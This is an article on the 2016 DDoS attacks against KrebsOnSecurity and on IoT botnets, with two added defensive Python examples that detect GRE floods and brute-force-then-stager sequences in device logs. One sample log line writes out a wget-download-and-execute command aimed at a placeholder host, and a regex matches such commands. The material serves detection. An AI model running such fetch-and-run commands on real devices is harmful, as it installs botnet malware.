Security journalist Brian Krebs has been the prime target of a major attack, and the new weapon behind DDoS attacks is IoT devices.
Krebs posted earlier this month about vDOS, an Israeli online DDoS service reportedly responsible for “277 million seconds of attack time, or approximately 8.81 years worth of attack traffic.” Last Tuesday, he detailed how the two individuals behind vDOS were arrested. Hours after Krebs identified one of the vDOS founders, his site was knocked offline by a wave of DDoS attacks, including SYN and HTTP floods, at an unprecedented size of 620 Gbps.
Akamai's network redirected his website to 127.0.0.1 to sinkhole all the malicious traffic and bring KrebsOnSecurity back online. Yet as the DDoS attacks persisted, the expense of fighting them became overwhelming, and as of Thursday Akamai suspended its services.
Along with the attacks on Choopa/Vultr, OVH (now the largest on record at 1.1 Tbps), Blizzard Games, and Riot Games that followed immediately after KrebsOnSecurity, Krebs believes they are all likely traceable to Internet of Things (IoT) devices such as routers, IP cameras and DVRs that were easily taken over by botnet software because of poor password protection.
“Preliminary analysis of the attack traffic suggests that perhaps the biggest chunk of the attack came in the form of traffic designed to look like it was generic routing encapsulation (GRE) data packets, a communication protocol used to establish a direct, point-to-point connection between network nodes,” Krebs said.
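To make the GRE observation concrete from a defender's side, here is an added example (not Krebs's analysis or any vendor's code) that parses the base GRE header defined in RFC 2784 and flags sources whose GRE packet rate in any one-second bucket exceeds a threshold. The packet list, the addresses (RFC 5737 documentation ranges), the threshold and the `known_tunnel_peers` allow-list are all constructed assumptions for the example; real GRE tunnels between known endpoints are legitimate, which is why the allow-list exists.

```python
"""Added example: GRE header parsing and a per-source GRE rate check.

IP protocol 47 carries GRE. The base header (RFC 2784) is 4 bytes:
  C(1 bit) | Reserved0(12) | Ver(3) | Protocol Type(16)
If C is set, 4 more bytes follow: Checksum(16) | Reserved1(16).
"""
import struct
from collections import Counter

IPPROTO_GRE = 47
GRE_PROTO_IPV4 = 0x0800  # EtherType of the encapsulated payload


def parse_gre_header(data: bytes) -> dict:
    """Parse a GRE header; raise ValueError if the bytes are too short."""
    if len(data) < 4:
        raise ValueError("truncated GRE header")
    flags_ver, proto = struct.unpack("!HH", data[:4])
    has_checksum = bool(flags_ver & 0x8000)
    version = flags_ver & 0x7  # 0 for RFC 2784 GRE, 1 for PPTP-style GRE
    header_len = 8 if has_checksum else 4
    if len(data) < header_len:
        raise ValueError("truncated GRE header")
    return {
        "checksum_present": has_checksum,
        "version": version,
        "protocol_type": proto,
        "header_len": header_len,
        "payload": data[header_len:],
    }


def build_gre(proto_type=GRE_PROTO_IPV4, checksum=False, payload=b"") -> bytes:
    """Build a minimal GRE header; used here only to construct sample packets."""
    flags_ver = 0x8000 if checksum else 0
    hdr = struct.pack("!HH", flags_ver, proto_type)
    if checksum:
        hdr += struct.pack("!HH", 0, 0)  # checksum and Reserved1 left zero
    return hdr + payload


def detect_gre_flood(packets, pps_threshold=100, known_tunnel_peers=frozenset()):
    """packets: iterable of (timestamp_seconds, src_ip, ip_proto, raw_bytes).

    Returns {src_ip: peak_gre_pps} for sources that are not known tunnel
    peers and whose GRE packet count in some one-second bucket exceeds
    pps_threshold. Malformed GRE still counts toward the rate: a flood does
    not need to be well-formed to consume bandwidth.
    """
    per_src_second = Counter()
    for ts, src, proto, raw in packets:
        if proto != IPPROTO_GRE:
            continue
        try:
            parse_gre_header(raw)
        except ValueError:
            pass
        per_src_second[(src, int(ts))] += 1
    peaks = {}
    for (src, _sec), n in per_src_second.items():
        if src in known_tunnel_peers or n <= pps_threshold:
            continue
        peaks[src] = max(peaks.get(src, 0), n)
    return peaks


# Constructed sample: 300 GRE packets from one source inside one second,
# a handful from a legitimate tunnel peer, and one unrelated TCP packet.
SAMPLE_PACKETS = (
    [(0.001 * i, "203.0.113.7", IPPROTO_GRE, build_gre(payload=b"\x45" + b"\x00" * 19))
     for i in range(300)]
    + [(0.5 * i, "198.51.100.2", IPPROTO_GRE, build_gre(checksum=True)) for i in range(4)]
    + [(0.2, "192.0.2.9", 6, b"")]
)

if __name__ == "__main__":
    print(parse_gre_header(build_gre()))
    print(detect_gre_flood(SAMPLE_PACKETS))
    print(detect_gre_flood(SAMPLE_PACKETS, known_tunnel_peers={"198.51.100.2"}))
```

A per-second bucket is a deliberately coarse heuristic; in practice the threshold should be set from a baseline of the network's normal GRE volume, and the allow-list populated from the tunnel endpoints the network actually operates.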
During the same week, on Thursday, Symantec published a report warning that insecure IoT devices are increasingly being compromised and used to launch DDoS attacks. Symantec observed that the number of cross-platform DDoS malware families able to infect Linux-based systems rose to a total of 11 in 2015, a trend it expects to continue this year. These threats are designed to run on Linux-based firmware for the CPU architectures commonly used in embedded and IoT devices.
Symantec’s data shows that most of these systems are not compromised because of poor encryption or firmware lacking the latest security updates. Instead, attackers typically scan the internet for devices with open Telnet or SSH ports and try to log in by brute-forcing commonly used credentials. Another common tactic is to use a wget or tftp command to download a shell script (.sh) that in turn downloads the bot binaries. Once the binaries are executed, the attacker controls the device over a connection established to a command-and-control (C&C) server.
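The chain just described (credential guessing against Telnet/SSH, a successful login from the same source, then a fetch-and-run of a shell script) is visible in a device's own logs. The following is an added detection example, not Symantec's or Krebs's code: it runs over constructed syslog lines whose login messages mimic the dropbear SSH daemon common on embedded Linux, plus a hypothetical `cmd="..."` command-audit line. The log text, hostnames and addresses (RFC 5737 ranges) are constructed, and the window and failure threshold are assumptions to tune per environment.

```python
"""Added example: flag the Telnet/SSH brute-force -> login -> stager-download
pattern in constructed embedded-device syslog lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (dropbear-style auth lines plus a hypothetical
# command-audit line). 203.0.113.7 guesses credentials, logs in, then
# fetches and runs a script; 192.0.2.9 is a single benign failure.
SAMPLE_LOG = """\
Sep 22 03:14:01 cam01 dropbear[412]: Bad password attempt for 'root' from 203.0.113.7:51822
Sep 22 03:14:02 cam01 dropbear[413]: Bad password attempt for 'admin' from 203.0.113.7:51823
Sep 22 03:14:03 cam01 dropbear[414]: Bad password attempt for 'root' from 203.0.113.7:51824
Sep 22 03:14:04 cam01 dropbear[415]: Bad password attempt for 'root' from 192.0.2.9:40211
Sep 22 03:14:05 cam01 dropbear[416]: Bad password attempt for 'root' from 203.0.113.7:51825
Sep 22 03:14:06 cam01 dropbear[417]: Bad password attempt for 'admin' from 203.0.113.7:51826
Sep 22 03:14:07 cam01 dropbear[418]: Password auth succeeded for 'root' from 203.0.113.7:51827
Sep 22 03:14:09 cam01 audit[431]: cmd="cat /proc/cpuinfo"
Sep 22 03:14:11 cam01 audit[432]: cmd="wget http://198.51.100.5/x.sh -O /tmp/x.sh; sh /tmp/x.sh"
""".splitlines()

TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) ")
FAIL_RE = re.compile(r"Bad password attempt for '(?P<user>[^']+)' from (?P<ip>[\d.]+):\d+")
SUCCESS_RE = re.compile(r"Password auth succeeded for '(?P<user>[^']+)' from (?P<ip>[\d.]+):\d+")
CMD_RE = re.compile(r'cmd="(?P<cmd>[^"]*)"')
# A download tool, a .sh file, and then a shell invoked after ; | or &.
# A plain download with no execution does not match.
STAGER_RE = re.compile(r"\b(?:wget|curl|tftp)\b.*\.sh\b.*[;|&]\s*(?:sh|bash)\b")


def parse_syslog_prefix(line, year=2016):
    """Return (timestamp, host) from a BSD-syslog style prefix."""
    m = TS_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised syslog line: {line!r}")
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["host"]


def detect_iot_intrusion(lines, max_fails=5, window_s=60):
    """Return a list of alert dicts, in log order.

    bruteforce:            max_fails or more failed logins from one source
                           within window_s seconds (reported once per source)
    login_after_bruteforce: a successful login from a source already flagged
    stager_download:       a command that downloads a .sh and executes it
    """
    alerts = []
    recent_fails = defaultdict(deque)  # source ip -> timestamps in window
    flagged = set()
    for line in lines:
        ts, host = parse_syslog_prefix(line)
        m = FAIL_RE.search(line)
        if m:
            q = recent_fails[m["ip"]]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= max_fails and m["ip"] not in flagged:
                flagged.add(m["ip"])
                alerts.append({"kind": "bruteforce", "host": host, "source": m["ip"],
                               "detail": f"{len(q)} failed logins within {window_s}s"})
            continue
        m = SUCCESS_RE.search(line)
        if m:
            if m["ip"] in flagged:
                alerts.append({"kind": "login_after_bruteforce", "host": host,
                               "source": m["ip"], "detail": f"user {m['user']}"})
            continue
        m = CMD_RE.search(line)
        if m and STAGER_RE.search(m["cmd"]):
            alerts.append({"kind": "stager_download", "host": host,
                           "source": "-", "detail": m["cmd"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_iot_intrusion(SAMPLE_LOG):
        print(alert)
```

The three alert kinds are deliberately kept separate: a burst of failures alone is noisy on any internet-exposed device, but a success from a flagged source, followed by a fetch-and-run command, is the sequence worth paging on. The mitigation the page implies remains the cheaper fix: change the default credentials and do not expose Telnet or SSH to the internet.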
The recent attacks set a precedent: attackers now have the capability to compromise a giant network of devices for future, and larger, DDoS attacks.